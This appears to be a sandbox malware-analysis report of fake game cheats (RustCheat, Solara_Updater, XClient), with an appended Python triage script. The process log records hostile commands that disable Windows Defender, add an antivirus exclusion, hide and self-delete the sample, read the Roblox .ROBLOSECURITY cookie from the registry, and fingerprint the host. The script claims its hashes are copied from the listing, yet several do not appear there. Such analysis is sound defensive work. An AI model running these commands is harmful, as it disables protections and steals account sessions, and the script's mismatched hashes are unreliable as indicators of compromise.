"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe.exe

"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"

C:\hostNet\RuntimeBroker.exe

"C:\hostNet\RuntimeBroker.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Loader.exe

C:\Users\Admin\AppData\Local\Temp\sol.exe

C:\hostNet\rlqSVEj.vbe

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara_Updater.exe.log

C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukdf3zdd.d5a.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log

C:\Windows\System32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA1 a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512 c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 74a6b79d36b4aae8b027a218bc6e1af7
SHA1 0350e46c1df6934903c4820a00b0bc4721779e5f
SHA256 60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04
SHA512 60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 276798eeb29a49dc6e199768bc9c2e71
SHA1 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256 cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA512 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5838f9ee921b4c449391e6adc1763fa
SHA1 d6690b109e2150a61a995fb40b2a3b6931053c86
SHA256 d6aad71bbd50b2660a31a0676eebf3f095ba1ac3a0800c4be9fd3dfded7a0fe7
SHA512 7056bdb5e0eb479494e4f101e04a410e774c280aa33de61561f91d090fefe81bff38f1a9ffcd8a75ebe5e024dfed4867fd45f7932d53c5c84ec3499a99dd9dae

memory/4792-341-0x00007FF863050000-0x00007FF863B11000-memory.dmp

memory/2800-367-0x0000000000410000-0x00000000005EE000-memory.dmp

memory/2800-369-0x0000000002780000-0x000000000278E000-memory.dmp

memory/2800-371-0x000000001B210000-0x000000001B22C000-memory.dmp

memory/2800-373-0x000000001B230000-0x000000001B248000-memory.dmp

memory/2800-375-0x000000001B1F0000-0x000000001B1F8000-memory.dmp

memory/2800-377-0x000000001B200000-0x000000001B20C000-memory.dmp

C:\Recovery\WindowsRE\wscript.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/2800-422-0x000000001CC40000-0x000000001CD55000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uKHduJLxL6KTVQ1

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
SHA256 5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d
SHA512 7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

C:\Users\Admin\AppData\Local\Temp\kjlpgQ4TCdNBpDW

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Temp\Yd6DgKBvNCXyV6p

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\6QxFtPFVBXAfpYj

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\6sre2kRyaUJ5KEK\Display\Display.png

MD5 4673dedb39902476a43db7db32840951
SHA1 390c159f2be8bcb58c7860360b1b37c9dfc5732c
SHA256 57f14bd24019815bd4249a1cb02ef6717f309ce5711004e3622febdb4f31751e
SHA512 a64b3beb97e4e5c08fd943d5b52d7d4759fba0881ff39433788ec932ad14c5c83d3cd5345c855df643655b6b939d99115ed76aee4908552157ba0629f6d84e3f

memory/3088-699-0x0000000000280000-0x0000000000288000-memory.dmp
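The Files listing above is raw sandbox output, and most of it is noise an analyst has to filter by hand. The script below is an added example (the editor's, not the sandbox vendor's tooling) that parses the listing's own line format (a path line, the hash lines that follow it, and `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` entries), rejects hash lines of the wrong length, flags the entries worth pulling first, and sizes the dumped memory regions per PID. The embedded excerpt copies paths and hashes from this page (SHA1/SHA512 lines and most entries omitted for brevity); the triage rules, the system-binary list and the suggested follow-ups in each finding are the editor's assumptions, not conclusions the report itself draws.

```python
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

# Excerpt of the Files listing above (paths and hashes copied from the page; SHA1/SHA512 lines and most entries omitted).
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log

MD5 4c8fa14eeeeda6fe76a08d14e08bf756
SHA256 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7f81c3ba861f1a722421cc95d105fecd
SHA256 cebaa9795b2039a5784a0edcbf89cb298259a34c5aa7f89ba31344203ea37a81

C:\Windows\System32\drivers\etc\hosts

MD5 4028457913f9d08b06137643fe3e01bc
SHA256 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

memory/4792-341-0x00007FF863050000-0x00007FF863B11000-memory.dmp

memory/2800-367-0x0000000000410000-0x00000000005EE000-memory.dmp

C:\Recovery\WindowsRE\wscript.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749

C:\Users\Admin\AppData\Local\Temp\6sre2kRyaUJ5KEK\Display\Display.png

MD5 4673dedb39902476a43db7db32840951
SHA256 57f14bd24019815bd4249a1cb02ef6717f309ce5711004e3622febdb4f31751e
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)

MemoryDump = namedtuple("MemoryDump", "pid seq start end")  # start/end are virtual addresses

def parse_report(text: str):
    # A path line opens a record, hash lines attach to the open record, dump entries stand alone.
    files, dumps, current = [], [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if m := DUMP_RE.match(line):
            dumps.append(MemoryDump(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
        elif m := HASH_RE.match(line):
            if current is None or len(m[2]) != HASH_LEN[m[1]]:
                raise ValueError(f"malformed hash line: {line}")
            current.hashes[m[1]] = m[2].lower()
        else:
            current = FileRecord(line)
            files.append(current)
    return files, dumps

# Assumed triage heuristics (the editor's, not the sandbox's); the binary list is illustrative, not exhaustive.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_BINARIES = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "svchost.exe"}

def triage(files):
    findings = []
    ps_starts = sum(f.path.endswith(r"\StartupProfileData-NonInteractive") for f in files)
    for f in files:
        p = PureWindowsPath(f.path)
        low, name, parent = f.path.lower(), p.name.lower(), str(p.parent).lower()
        if low == r"c:\windows\system32\drivers\etc\hosts":
            findings.append((f.path, "hosts file rewritten: diff against a known-good copy for sinkholed update/AV domains"))
        if name in SYSTEM_BINARIES and parent not in SYSTEM_DIRS:
            findings.append((f.path, "system binary name outside System32/SysWOW64: masquerading copy, compare its hash with the real one"))
        if "\\clr_v4.0\\usagelogs\\" in low and name.endswith(".exe.log"):
            findings.append((f.path, f".NET usage log: a managed assembly named {p.name[:-4]} ran on this host"))
        if name.endswith(".png") and "\\appdata\\local\\temp\\" in low:
            findings.append((f.path, "image written under Temp by the sample: pull it, it may be a screen capture"))
    if ps_starts:
        findings.append(("PowerShell", f"{ps_starts} non-interactive PowerShell startup(s) recorded"))
    return findings

def dump_summary(dumps):
    # Per-PID count and total size of dumped regions, derived from the dump file names alone.
    per_pid = defaultdict(lambda: {"regions": 0, "bytes": 0})
    for d in dumps:
        per_pid[d.pid]["regions"] += 1
        per_pid[d.pid]["bytes"] += d.end - d.start
    return dict(per_pid)

if __name__ == "__main__":
    files, dumps = parse_report(REPORT_EXCERPT)
    for path, why in triage(files):
        print(f"[!] {path}\n    {why}")
    for pid, s in sorted(dump_summary(dumps).items()):
        print(f"pid {pid}: {s['regions']} region(s), {s['bytes']:#x} bytes dumped")
```

Run against the full listing, the same parser gives every dropped file's hash set for IOC matching, and the per-PID dump sizes tell you which process (here 2800 and 4792) is worth carving first; the `wscript.exe` copy under `C:\Recovery\WindowsRE` and the rewritten `hosts` file are the two entries to check on any host that matches the SHA256 values.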